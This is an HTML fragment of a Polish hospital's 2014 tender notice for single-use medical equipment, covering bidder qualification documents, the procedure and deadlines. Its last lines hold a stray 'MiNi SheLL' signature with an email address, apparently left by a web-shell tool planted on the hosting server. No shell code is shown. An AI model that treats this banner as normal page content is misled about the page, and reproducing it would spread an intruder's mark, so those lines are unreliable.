<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia stosownego oświadczenia z art. 22 ust. 1 ustawy prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 3 do SIWZ oraz stosownego wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości brutto, przedmiotu, dat wykonywania  i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Dla Zamawiającego warunkiem wystarczającym będzie wykazanie wykonania w w/w okresie co najmniej 2 zamówień na dostawę sprzętu medycznego jednorazowego użytku , potwierdzonych stosownymi dokumentami, że zostały/są wykonywane należycie. Dowodami, o których mowa wyżej są: poświadczenie (wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu), inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. Ocena spełnienia tego warunku zostanie dokonana na podstawie kompletności złożonego oświadczenia, wykazu oraz złożonych dowodów wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia stosownego oświadczenia z art. 22 ust. 1 ustawy prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 3 do SIWZ. Ocena spełnienia tego warunku zostanie dokonana na podstawie kompletności złożonego oświadczenia wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia stosownego oświadczenia z art. 22 ust. 1 ustawy prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 3 do SIWZ. Ocena spełnienia tego warunku zostanie dokonana na podstawie kompletności złożonego oświadczenia wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia stosownego oświadczenia z art. 22 ust. 1 ustawy prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 3 do SIWZ. Ocena spełnienia tego warunku zostanie dokonana na podstawie kompletności złożonego oświadczenia wg zasady spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie - załącznik nr 6 do SIWZ</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy - wg wzoru stanowiącego załącznik nr 1 do SIWZ. 2.Wypełniony formularz asortymentowo-ilościowo-cenowy (dla wybranego zadania) - wg wzoru stanowiącego załącznik  nr 2 do SIWZ. 3. Pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielnie zamówienia albo reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 4. Dokumenty określone w rozdz. IV - PRZEDMIOT ZAMÓWIENIA - Warunki graniczne w zakresie Pakietu nr 21. 5. Pisemne zobowiązanie innych podmiotów zgodnie z art. 26 ust. 2 b) i 2 c) ustawy do oddania do dyspozycji Wykonawcy niezbędnych zasobów (wiedza, doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia oraz zdolności finansowe) na okres korzystania z nich przy wykonywaniu zamówienia - dotyczy Wykonawców, którzy polegają na wiedzy, doświadczeniu, potencjale technicznym i osobach zdolnych do wykonania zamówienia oraz zdolnościach finansowych innych pomiotów. 6. W przypadku dokumentów, o których mowa w pkt. 4, 8, 9, 10 SIWZ - rozdz. VII innych podmiotów, na okoliczność gdy Wykonawca będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Zamawiający żąda tych dokumentów, tylko wtedy gdy podmioty będą brały udział w realizacji części zamówienia. W przypadku kiedy podmiot trzeci nie będzie brał udziału w realizacji zamówienia lecz udostępni swoje zasoby np. sprzęt, pracowników - Zamawiający nie żąda tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy zostały określone w zał. nr 7 do SIWZ - wzór umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalpediatryczny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Pediatryczny ul. Sobieskiego 83 43-300 Bielsko-Biała, Budynek Administracji - Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2014 godzina 10:00, miejsce: Szpital Pediatryczny ul. Sobieskiego 83 43-300 Bielsko-Biała, Budynek Administracji - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do bezpośredniego kontaktowania się z Wykonawcami są: Magdalena Kanpczyk - tel. 33 828 40 23, Bernarda Sieracka - tel. 33 828 40 35, Beata Popow - tel. 33 828 40 79 w sprawach  dotyczących postępowania (zamówienia  publiczne): Joanna Przybyłowicz  tel. 33 828 40 47, faks: 33 815 16 30..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com